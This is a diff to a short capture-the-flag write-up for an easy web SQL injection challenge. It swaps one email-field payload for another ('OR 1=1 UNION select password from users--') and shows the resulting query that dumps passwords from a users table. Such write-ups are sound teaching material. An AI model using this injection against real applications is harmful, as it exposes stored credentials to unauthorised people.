utisss/foreverctf-writeups/web-sqli-easy.md

 If we input an email of:
 ```
-' UNION SELECT password FROM users; --
+' OR 1=1 UNION select password from users--
 ```

 Then the SQL command looks like:
 ```
-SELECT username FROM users WHERE email = '' UNION SELECT password FROM users; --
+SELECT username FROM users WHERE email = '' OR 1=1 UNION select password from users--

 ```